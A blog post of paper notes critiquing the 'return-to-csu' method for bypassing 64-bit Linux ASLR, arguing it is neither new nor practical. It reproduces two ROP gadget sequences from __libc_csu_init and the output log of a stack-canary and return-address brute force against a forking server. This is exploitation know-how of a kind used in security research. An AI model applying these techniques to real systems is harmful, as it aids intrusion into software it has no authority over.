Title: Paper notes: return-to-csu: A New Method to Bypass 64-bit Linux ASLR
Date: 2018-03-27 16:25

- Complete title: return-to-csu: A New Method to Bypass 64-bit Linux ASLR
- PDF: [de2792f69f394c398a1aef57e1f3ceb322a901a2_asia-18-Marco-return-to-csu-a-new-method-to-bypass-the-64-bit-Linux-ASLR-wp.pdf]({static}/files/papers/de2792f69f394c398a1aef57e1f3ceb322a901a2_asia-18-Marco-return-to-csu-a-new-method-to-bypass-the-64-bit-Linux-ASLR-wp.pdf)

The paper is presenting two rop gadgets present in `__libc_csu_init`, in the
[`ctr0`](https://en.wikipedia.org/wiki/Crt0) (called "attached code" in the
paper).
It's public knowledge (at least in the CTF/wargames world) that there are some
gadgets there, and was even greatly detailed
by [Reno Robert on v0id s3curity](
https://v0ids3curity.blogspot.fr/2013/07/some-gadget-sequence-for-x8664-rop.html
) in 2013, [presented at
avtokyo](http://inaz2.hatenablog.com/entry/2014/11/16/015347) and 
documented by [hatena]( http://inaz2.hatenablog.com/entry/2014/07/31/010158 )
in 2014, documented on x64 by [math1as](http://math1as.com/2016/05/07/linux-x64-common-ropgadget/) in 2016,
and likely present in your [favourite modern wargame](http://pwnable.kr).

This construction is irrelevant in the real world: if the binary is non-PIE,
you always have better gadgets to use, and if the binary is PIE, you can't use
this one anyway.

The variants of the gadgets in the paper being:

```gas
pop %rbx
pop %rbp
pop %r12
pop %r13
pop %r14
pop %r15
retq
```

and

```gas
mov %r13, %rdx
mov %r14, %rsi
mov %r15d, %edi
callq *(%r12, %rbx, 8)
```

There are some proposed solutions to get rid of it, like moving it into libc, or an
partial rewriting of the binary.

Apparently, the author patched [ropper](https://github.com/sashs/Ropper) to
make it detect the gadgets, but since there is no code in the paper, and no
patch upstream, who knows…

The only ASLR "bypass" present in the paper is a bruteforce of a forking
server, again without code:

```C
./exploit-server_64_PIE.py -s 10.0.2.15 -p 9999
[+] Exploit ASLR 64 bit systems
[+] Trying to find out the canary offset
[+] Offset is 56 bytes
[+] Brute forcing stack canary
[+] SSP value is 0x0e8e6dc24e458900
[+] Brute forcing EBP
[+] EBP value is 0x00007ffd694d4158
[+] Brute forcing Saved EIP
[+] EIP value is 0x0000555cd2686ff4
[+] Text Base at 0x0000555cd2686000
Libc write function is at 0x00007fda3c12a0b0
```

This seems to be yet another instance of a *return-to-[Blackhat](https://www.blackhat.com/asia-18/briefings.html#return-to-csu-a-new-method-to-bypass-64-bit-linux-aslr)* paper.